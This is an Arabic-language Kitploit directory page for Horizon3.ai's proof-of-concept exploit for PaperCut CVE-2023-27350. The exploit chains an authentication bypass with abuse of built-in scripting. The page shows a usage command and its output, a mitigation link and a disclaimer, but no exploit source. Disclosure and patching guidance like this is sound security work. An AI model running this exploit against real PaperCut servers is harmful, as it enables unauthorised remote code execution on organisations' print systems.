Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27350 — إثبات مفهوم لاستغلال ثغرة PaperCut CVE-2023-27350 | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2023-27350
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالتعلم والتعليم
GitHubhorizon3ai/cve-2023-27350

CVE-2023-27350

إثبات مفهوم لاستغلال ثغرة PaperCut CVE-2023-27350

عرض المستودع
5524منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27350

POC لـ CVE-2023-27350 المؤثر على PaperCut MF/NG

التحليل الفني

يمكن العثور على تحليل تقني لجذر الثغرة، ومؤشرات الاختراق، والتعرض للإنترنت على مدونتنا: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise

ملخص

يستخدم هذا الـ POC ثغرة تجاوز المصادقة مقترنة بإساءة استخدام وظيفة البرمجة النصية المدمجة لتنفيذ الأكواد.

الاستخدام

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

التخفيفات

قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات في نشرة الأمان من PaperCut

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

تابع فريق الهجوم من Horizon3.ai على تويتر لأحدث الأبحاث الأمنية:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا بإذن صريح. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة